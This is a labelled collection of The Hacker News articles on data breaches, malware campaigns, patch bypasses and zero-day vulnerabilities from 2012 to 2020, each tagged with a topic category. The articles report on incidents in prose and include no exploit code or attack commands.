Yahoo Admits 1 Billion Accounts Compromised in Newly Discovered Data Breach,https://thehackernews.com/2016/12/yahoo-data-breach-billion.html,"In what believe to be the largest data breach in history, Yahoo is reporting a massive data breach that disclosed personal details associated with more than 1 Billion user accounts in August 2013.
…And it's separate from the one disclosed by Yahoo! in September, in which hackers compromised as many as 500 Million user accounts in late 2014.
What's troubling is that the company has not been able to discovered how ""an unauthorized third party"" were able to steal the data associated with more than one Billion users.
The data breach officially disclosed on Wednesday actually occurred in 2013 and, just like the one in 2014, allowed the cyber crooks to obtain personal information of its users but not credit card details.
Here's what Yahoo's chief information security officer Bob Lord says the hackers obtained:
""The stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers.""
The hashed passwords used an aging algorithm called MD5 that can easily be cracked. Moreover, in some incidents, the hack revealed unencrypted security questions and answers that would provide quick access to users accounts.
The public disclosure of this latest data breach came upon ""further analysis"" of data that law enforcement provided Yahoo in November.
Change your Password and Security Q&A Immediately
Of course, if you are one of those potentially affected users, you are strongly recommended to change your passwords and invalidate affected security questions.
Also, if you are using the same password and answers for security questions somewhere else, change them too.
Yahoo has started notifying the account holders affected by the massive data breach, requiring them to change their passwords immediately.
Both the data breaches at Yahoo! came after the company negotiated a deal to sell its core internet business to Verizon Communication Inc for $4.8 Billion.
The September disclosure of half a billion users' breach prompted Verizon to say in October that it might withdraw from the agreement to buy Yahoo.
Here's the statement from Verizon spokesman Bob Verettoni about the recent largest data breach:
""As we've said all along, we will evaluate the situation as Yahoo continues its investigation. We will review the impact of this new development before reaching any final conclusions.""
Previous data breach news had already magnified company's problems, and now when another data breach affecting a Billion users has been disclosed, would Yahoo be able to save its acquisition deal?
",Data_Breaches
Microsoft becomes latest victim of Cyber attack,https://thehackernews.com/2013/02/microsoft-becomes-latest-victim-of.html,"Microsoft has become the latest victim of to Cyber attack and confirm that small number of its computers, including some in its Mac software business unit, were infected with malware.
Microsoft added, malicious software used in a cyber attack is very similar to those experienced by Facebook and Apple recently. Microsoft gave few other details about the break-in, ""We have no evidence of customer data being affected and our investigation is ongoing.""
""During our investigation, we found a small number of computers, including some in our Mac business unit that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing,"" Microsoft said.
""This type of cyber attack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries,"" the company said.
Last week, Apple said its computers were attacked by the same hackers who targeted Facebook a week earlier and Facebook said it had traced a cyber attack back to China which had infiltrated employees' laptops.
",Cyber_Attack
Plugx RAT targeting government organizations in Japan using spear phishing,https://thehackernews.com/2012/09/plugx-rat-targeting-government.html,"Roland Dela Paz (Threat Researcher) at TrendMirco reported that last year a Malware Campaign to target specific users in Japan, China, and Taiwan once again on rise using new breed of Remote Access Tool (RAT) called Plugx (also known as Korplug). This new custom made version comes for less recognition and more elusiveness from security researchers.
He also mention that last year campaign used the Poison Ivy RAT, but now its Plugx take its place. ""Similar to previous Poison Ivy campaigns, it also arrives as an attachment to spear-phished emails either as an archived, bundled file or specially crafted document that exploits a vulnerability in Adobe Acrobat Reader or Microsoft Office. We've also encountered an instance of Plugx aimed at a South Korean Internet company and a U.S. engineering firm."" Roland mentioned.
The attached pdf exploits CVE-2010-2883 (with Plugx (RAT) payload connects to a command and control (C&C) server named {BLOCKED}eo.flower-show.org.
CVE-2010-2883: Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010)
This C&C server appeared to be have been used by Poison Ivy and PlugX variants. According to Roland this rat drop a file at %System Root%\Documents and Settings\All Users\SxS\bug.log which contain it own errors and then possibly it uploads back to attacker server for Auditing. This shows that , this variant is still in beta stage. Trend Micro monitoring PlugX's development and We at THE HACKER NEWS, will update you with new info when published.
",Malware
More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry,https://thehackernews.com/2017/05/eternalblue-smb-exploit.html,"Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonged to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way.
The April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of Windows hacking tools, including dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
I have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.
The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, ""a backdoor may persist and compromised credentials may be used to regain access"" to the affected systems.
Both campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks
Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, ""at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack.""
This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet
This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on 'Agony rootkit' to make persistent.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
""These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch,"" Secdo concluded.
""We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible.""
These malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access.
The recent example is of ""Adylkuzz,"" a recently-discovered stealthy cryptocurrency-mining malware that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.
",Malware
Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again,https://thehackernews.com/2018/04/oracle-weblogic-rce-exploit.html,"Earlier this month, Oracle patched a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server.
However, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now found a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again.
WebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically.
Initially discovered in November last year by Liao Xinxi of NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001.
If exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.
Since a proof-of-concept (PoC) exploit for the original Oracle WebLogic Server vulnerability has already been made public on Github and someone has just bypassed the patch as well, your up-to-date services are again at risk of being hacked.
Although @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take a few hours or days for skilled hackers to figure out a way to achieve same.
Currently, it is unclear when Oracle would release a new security update to address this issue that has re-opened CVE-2018-2628 flaw.
In order to be at least one-step safer, it is still advisable to install April patch update released by Oracle, if you haven't yet because attackers have already started scanning the Internet for vulnerable WebLogic servers.
",Cyber_Attack
The Hacker News Hacking Awards : Best of Year 2011,https://thehackernews.com/2012/01/hacker-news-hacking-awards-best-of-year.html,"The Hacker News Hacking Awards : Best of Year 2011
2011 has been labeled the ""Year of the Hack"" or ""Epic #Fail 2011"". Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security. Every year there are always forward advancements in the tools and programs that can be used by the hackers.
At the end of year 2011 we decided to give ""The Hacker News Awards 2011"". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News.
Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak's, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: ""LulzSec was here you sexy bastards! Stupid Sony, so very stupid.""
The Hacker News Awards Categories & Winners
1.) Person of the Year : Julian Paul Assange
He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the ""Age of WikiLeaks"". Assange described himself in a private conversation as ""the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest"". Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda's. Keep up the good work Wikileaks and we stand in support and behind you.
2.) Best Hacking Group of the Year 2011 : ANONYMOUS
DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN'T GOIN AWAY!
Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here.
3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER
CHARLIE SHOWS TUNA ISN'T THE ONLY THING TO PROFIT FROM!
Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone's or iPad's security. Charlie Miller gets a kick of out defeating Apple's security mechanisms, using his hacking skills to break into Macbooks and iPhones.
4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS
GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS! NOT!!!!!
HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous, hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund's email.
5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI
TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!!
Turkguvenligi also known by the name ""TG Hacker' hacked some very high profile sites using DNS Hijacking. Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was ""World Hackers Day"". TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008.
6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked)
BEWARE OF TIGER'S IN MOTION…….COMING TO YOUR WEBSITE SOON!
InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year.
7.) Malware of Year 2011 : DuQu
ALAH CAN'T HELP IRAN…….NOT WITH DuQu ON THE LOOSE!
This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities.
8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit)
HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT!
ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins.
9.) High Profile Hacker of the Year 2011 : LULZSEC
LULZSEC KEEPS US LAUGHING ALL THROUGH 2011!
Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things ""for the lulz"" and focus on the possible comedic and entertainment value of attacking targets.
10.) Biggest Victim of the Year 2011 : SONY
SONY SHINES AS THE BIGGEST VICTIM OF ALL!
Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony's websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) .
11.) Most Spamy Social Network : FACEBOOK
FACEBOOK OUTTA FACE IT……..IT'S A RIPE TARGET FOR 2012
Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds.
12.) Most Vulnerable Mobile OS of Year 2011 : ANDROIDS
MALWARE GETS A FREE RIDE ON MOBILE DEVICES!
Mobile devices are seeing a record number of Malware attacks, with Androids leading the way as the mobile operating systems are the most likely to be targeted. Android's vulnerability to malicious content including third-party apps, SMS Trojan viruses and unexpected bugs distributed through free Wi-Fi connections has risen by 45% in 2011. This year we have seen record-breaking numbers of Malware, especially on mobile devices, where the uptake is in direct correlation to popularity.
13.) Best Hacking Book of the Year: BACKTRACK 5 WIRELESS PENETRATION TESTING
ATTENTION CLASS, VIVEK RAMACHANDRAN HAS ENTERED THE ROOM!
Vivek Ramachandran is a world renowned security researcher and evangelist, who is well known for his discovery of the Wireless Caffe Latte attack, and author of the most amazing book ""BackTrack 5 Wireless Penetration Testing. This book is written completely from a practical perspective. The book wastes no time in delving into a hands-on session with wireless networking. All the way through there are lots of screengrabs, so you can see what should be happening on your screen.
14.) Most Innovative Hack : DIGITAL CERTIFICATES SPOOFING BY COMODO HACKER
COMODOHACKER BRINGS OUT THE DRAGON IN CYBER SECURITY CONCERNS
The name ""Comodohacker"" gets the most Innovative Hacker award from THN for the breach of the Internet's trust system arising from an outmoded method for assuring that a Web site is authentic. A breach that let a hacker spoof digital certificates for Google.com, Yahoo.com, and other Web sites is prompting browser makers to rethink security. A 21-year-old Iranian patriot took credit saying he was protesting US policy and retaliating against the US for its alleged involvement with last year's Stuxnet, which experts say was designed to target Iran's nuclear program.
15.) Biggest hack of the Year 2011 : SONY PLAYSTATION
SONY, SONY, WE PLAY YOUR LEAKS ON OUR OWN STATIONS!
The PlayStation Network is an online multiplayer gaming and digital media delivery service owned and run by Sony Computer Entertainment .On April 26, 2011 Sony Playstation announced its network and Qriocity had both been compromised by hackers between April 17 and April 19 allowing access to 70 million user accounts. Get full coverage on this News.
""TRUTH IS THE MOST POWERFUL WEAPON AGAINST INJUSTICE""
For additional information, please contact us at: thehackernews@gmail.com
",Malware
#Enter_at_your_own_Risk Cyber Awareness Magazine Issue January edition Released,https://thehackernews.com/2012/01/enteratyourownrisk-cyber-awareness.html,"#Enter_at_your_own_Risk Cyber Awareness Magazine Issue January edition Released
As we promised last month, The Hacker News along with Security-FAQs, SecManiac, Korben, Security-Shell, SecTechno have come together to bring you an outstanding array of internet security and hacking information. You can Download Here Special Magazine January 2012 Edition. Previous Editions available Here.
Sit back, read and enjoy :
Lee Ives from London, England talk about internet security for your children and what to watch out for and how to protect them and yourself. Security Expert, Pierluigi Paganini takes us on a visit to China and makes us wonder just how influential China's hacking is on world internet security. Read and decide for yourself.
Get political emotions warmed up reading ""Anatomy of a Revolution"" by our own editorial staff. Mourad Ben Lakhoua takes us on a scary journey of what new Malwares are lurking about and what to expect in the future.
Avram Marius Gabriel, who works under the pseudonym ""d3v1l"", gives us a look at an emerging technical society as like minded techies in Romania come together to share and learn. Get mad and take action as you read how your internet privacy and freedoms are about to be taken away in our editor Patti Galle's article on SOPA…….coming to your personal rights soon.
Manuel Dorne, administrator from Korben gives us a look at FIREFOX security tools. A must for any techie interested in ""how to."" And finally, a good read about politics in general in ""No Turning Back"" by our editorial staff.
Welcome to the January Special Edition…..let us know what you think, learn, and hope for! Connect With us on Google+ , Twitter and Facebook.
",Malware
VK.com HACKED! 100 Million Clear Text Passwords Leaked Online,https://thehackernews.com/2016/06/vk-com-data-breach.html,"Another day, another Data Breach! Now, Russia's biggest social networking site VK.com is the latest in the line of historical data breaches targeting social networking websites.
The same hacker who previously sold data dumps from MySpace, Tumblr, LinkedIn, and Fling.com, is now selling more than 100 Million VK.com records for just 1 Bitcoin (approx. US$580).
The database contains information like full names (first names and last names), email addresses, plain-text passwords, location information, phone numbers and, in some cases, secondary email addresses.
Yes, plain-text passwords. According to Peace, the passwords were already in plain text when the VK.com was hacked. So, if the site still stores passwords in cleartext today, this could be a real security risk for its users.
The data breach has initially been reported by LeakedSource search engine, which received portions of the database from one of the people who bought it.
The company has already analyzed the contents of the data dump and has added it to its service. So, you can use its search engine to check if you were compromised.
Russia's Facebook VK.com is said to be the largest social networking site in Europe with more than 350 Million users. So, the hack is believed to be the biggest hack the site has ever experienced.
The validity of the credentials exposed in the hack is thought to have been stolen in late-2012 or early 2013 when VK.com had just under 190 Million users.
All the LinkedIn, MySpace, and Tumblr data breaches are also believed to have taken place during the same duration, between 2012 and 2013, when many websites were not practicing appropriate Web security policies, like hashing and salting passwords.
The hacker, named Peace (or Peace_of_mind), is selling the dataset -- which is over 17 gigabytes in size -- on The Real Deal dark web marketplace for a mere 1 Bitcoin.
According to LeakedSource, the most common password used by VK.com users was ""123456,"" followed by ""qwerty"" and ""123123,"" which are incredibly easy to predict. Also, the vast majority of email addresses came from mail.ru.
Like other data breaches, I strongly suggest you change your password immediately, especially if you use the same password for other websites.
",Data_Breaches
Office based Trojan threat for Mac OS X by Chinese hackers,https://thehackernews.com/2012/03/office-based-trojan-threat-for-mac-os-x.html,"Office based Trojan threat for Mac OS X by Chinese hackers
Security company ESET watches the newly found Trojan for OS X establish connections and receive commands to steal information. Earlier this month, researchers from AlienVault and Intego reported a new malware attack targeting Tibetan NGOs (Non-Governmental Organizations).
The attack consisted of luring the victim into visiting a malicious website, which then would drop a malicious payload on the target's computer using Java vulnerability CVE-2011-3544 and execute it.
During installation on a Windows system, the payload deployed was a variant of Gh0st RAT (Remote Access Trojan). On the Mac though, a new payload, dubbed OSX/Lamadai.A, was used.
ESET observed that once the Trojan installs it will establish a connection to a hard-coded remote C&C server located in China, and will wait in ""busy"" loop where it attempts to maintain its connection with the server.
The server can then be used to issue commands to the infected system for uploading or downloading files, or execute scripts and commands the basics for allowing someone to remotely target a system, browse around on it, and steal information.
The command-and-control domain involved in the attack is located in China and the attack exploits a three-year-old vulnerability which no one could be bothered to fix.
",Malware
Update Your iOS Devices Now — 3 Actively Exploited 0-Days Discovered,https://thehackernews.com/2020/11/update-your-ios-devices-now-3-actively.html,"Apple on Thursday released multiple security updates to patch three zero-day vulnerabilities that were revealed as being actively exploited in the wild.
Rolled out as part of its iOS, iPadOS, macOS, and watchOS updates, the flaws reside in the FontParser component and the kernel, allowing adversaries to remotely execute arbitrary code and run malicious programs with kernel-level privileges.
The zero-days were discovered and reported to Apple by Google's Project Zero security team.
""Apple is aware of reports that an exploit for this issue exists in the wild,"" the iPhone maker said of the three zero-days without giving any additional details so as to allow a vast majority of users to install the updates.
The list of impacted devices includes iPhone 5s and later, iPod touch 6th and 7th generation, iPad Air, iPad mini 2 and later, and Apple Watch Series 1 and later.
The fixes are available in versions iOS 12.4.9 and 14.2, iPadOS 14.2, watchOS 5.3.9, 6.2.9, and 7.1, and as a supplemental update for macOS Catalina 10.15.7.
According to Apple's security bulletin, the flaws are:
CVE-2020-27930: A memory corruption issue in the FontParser library that allows for remote code execution when processing a maliciously crafted font.
CVE-2020-27950: A memory initialization issue that allows a malicious application to execute arbitrary code with kernel privileges.
CVE-2020-27932: A type-confusion issue that makes it possible for a malicious application to disclose kernel memory.
""Targeted exploitation in the wild similar to the other recently reported 0days,"" said Shane Huntley, Director of Google's Threat Analysis Group. ""Not related to any election targeting.""
The disclosure is the latest in the string of zero-days Project Zero has reported since October 20. First came the Chrome zero-day in Freetype font rendering library (CVE-2020-15999), then a Windows zero-day (CVE-2020-17087), followed by two more in Chrome and its Android variant (CVE-2020-16009 and CVE-2020-16010).
A patch for the Windows zero-day is expected to be released on November 10 as part of this month's Patch Tuesday.
While more details are awaited on whether the zero-days were abused by the same threat actor, it's recommended that users update their devices to the latest versions to mitigate the risk associated with the flaws.
",Vulnerability
iOS apps vulnerable to HTTP Request Hijacking attacks over WiFi,https://thehackernews.com/2013/10/ios-apps-vulnerable-to-http-request_29.html,"Security researchers Adi Sharabani and Yair Amit have disclosed details about a widespread vulnerability in iOS apps, that could allow hackers to force the apps to send and receive data from the hackers' own servers rather than the legitimate ones they were coded to connect to.
Speaking about the issue at RSA Conference Europe 2013 in Amsterdam, researchers have provided details on this vulnerability, which stems from a commonly used approach to URL caching.
Demonstration shows that insecure public networks can also provide stealth access to our iOS apps to potential attackers using HTTP request hijacking methods.
The researchers put together a short video demonstrating, in which they use what is called a 301 directive to redirect the traffic flow from an app to an app maker's server to the attacker's server.
There are two limitations also, that the attacker needs to be physically near the victim for the initial poisoning to perform this attack and the flaw works only against HTTP traffic.
""A victim walks into Starbucks, connects to the Wi-Fi and uses her favorite apps,"" explains an example. ""Everything looks and behaves as normal, however an attacker is sitting at a nearby table and performs a silent HRH attack on her apps. The next day, she wakes up at home and logs in to read the news, but she's now reading the attacker's news!""
They estimate that at least 10,000 iOS apps in the Apple App Store are vulnerable to the hack. As a result, apps that display news, stock quotes, social media content, or even some online banking details can be manipulated to display fraudulent information and intercept data sent by the end user.
Victims can uninstall apps to scrub their devices clean, and Skycure has released app code that prevents the web caching from taking place. It may be a while until developers can get this fix implemented, so connect to those public networks with extreme caution.
Swati Khandelwal - Working at 'The Hacker News'. Social Media Lover and Gadgets Girl. Speaker, Cyber Security Expert and Technical Writer.(Google+ Profile)
",Vulnerability
Remotely Exploitable Flaw Puts Millions of Internet-Connected Devices at Risk,https://thehackernews.com/2017/07/gsoap-iot-device-hacking.html,"Security researchers have discovered a critical remotely exploitable vulnerability in an open-source software development library used by major manufacturers of the Internet-of-Thing devices that eventually left millions of devices vulnerable to hacking.
The vulnerability (CVE-2017-9765), discovered by researchers at the IoT-focused security firm Senrio, resides in the software development library called gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML application.
Dubbed ""Devil's Ivy,"" the stack buffer overflow vulnerability allows a remote attacker to crash the SOAP WebServices daemon and could be exploited to execute arbitrary code on the vulnerable devices.
The Devil's Ivy vulnerability was discovered by researchers while analysing an Internet-connected security camera manufactured by Axis Communications.
""When exploited, it allows an attacker to remotely access a video feed or deny the owner access to the feed,"" researchers say.
""Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded.""
Axis confirmed the vulnerability that exists in almost all of its 250 camera models (you can find the complete list of affected camera models here) and has quickly released patched firmware updates on July 6th to address the vulnerability, prompting partners and customers to upgrade as soon as possible.
However, researchers believe that their exploit would work on internet-connected devices from other vendors as well, as the affected software is used by Canon, Siemens, Cisco, Hitachi, and many others.
Axis immediately informed Genivia, the company that maintains gSOAP, about the vulnerability and Genivia released a patch on June 21, 2017.
The company also reached out to electronics industry consortium ONVIF to ensure all of its members, including Canon, Cisco, and Siemens, those who make use of gSOAP become aware of the issue and can develop patches to fix the security hole.
Internet of Things (IoT) devices has always been the weakest link and, therefore, an easy entry for hackers to get into secured networks. So it is always advisable to keep your Internet-connected devices updated and away from the public Internet.
",Vulnerability
"Security firm Bit9 hacked, Stolen Digital Certs Used To Sign Malware",https://thehackernews.com/2013/02/security-firm-bit9-hacked-stolen.html,"Bit9 disclosed Friday that hackers had stolen digital code signing certificates from its network and have utilized it to sign malware. Bit9, a company that provides software and network security services to the U.S. government and at least 30 Fortune 100 firms.
""As a result, a malicious third party was able to illegally gain temporary access to one of our digital code-signing certificates that they then used to illegitimately sign malware,"" Bit9 Chief Executive Patrick Morley said in a blog post.
The attackers then sent signed malware to at least three of Bit9's customers, although Bit9 isn't saying which customers were affected or to what extent.
""Since we discovered this issue, we have been working closely with all of our customers to ensure they are no longer vulnerable to malware associated with the affected certificate."" and company said it has resolved the issue.
It is not the first time that hackers have breached a security firm as part of a sophisticated scheme to access data at one of their customers. EMC Corp's RSA Security division disclosed that it was breached in 2011.
",Cyber_Attack
Apple iOS 7 Updates Silently Remove Encryption for Email Attachments,https://thehackernews.com/2014/05/ios-apple-iphone-data-protection-email-attachment.html,"There is no question that Mobile devices have become a staple in everyday living around the world. But have you ever asked yourself, How Secure are the Android, iPhone or any other Smart devices? It is really important for us to think about the Security and Privacy of our Data stored in Smartphones.
In June 2010, Apple introduced 'Data protection' feature in iOS 4.0 devices that offer hardware encryption for all the data stored on the devices. ""Data protection enhances the built-in hardware encryption by protecting the hardware encryption keys with your passcode. This provides an additional layer of protection for your email messages attachments, and third-party applications."" Apple claimed in an old announcement.
But unexpectedly, In last few updates Apple has silently removed the email attachment encryption from data protection mechanisms. Noticed by Security Researcher - Andreas Kurtz, claims that since at least version 7.0.4 and including the current version 7.1.1, does not encrypt email attachments anymore.
""I verified this issue by restoring an iPhone 4 (GSM) device to the most recent iOS versions (7.1 and 7.1.1) and setting up an IMAP email account1, which provided me with some test emails and attachments. Afterwards, I shut down the device and accessed the file system using well-known techniques (DFU mode, custom ramdisk, SSH over usbmux). Finally, I mounted the iOS data partition and navigated to the actual email folder. Within this folder, I found all attachments accessible without any encryption/restriction"" he explained in a blog post.
That means, email attachments are not encrypted on the iOS devices by a unique 256-bit crypto engine, and if someone else gets access to your device, he will be able to get access to your private content.
He also tested the encryption mechanism with iOS forensics tool called 'iPhone Data Protection' for POP or ActiveSync email accounts, and verified that iOS latest versions are not able to encrypt email attachments.
At this point, even we can't answer that why Apple removed the encryption for Email attachments, but this disclosure is definitely right now hitting my mind with more controversial questions about relationship with Apple and NSA.
Andreas Kurtz has already reported the issue to Apple Security team and they replied that Apple were aware of it. But I guess Apple has no plan to patch the issue in upcoming iOS updates, as they have not indicated anything related in email conversion with Kurtz.
",Vulnerability
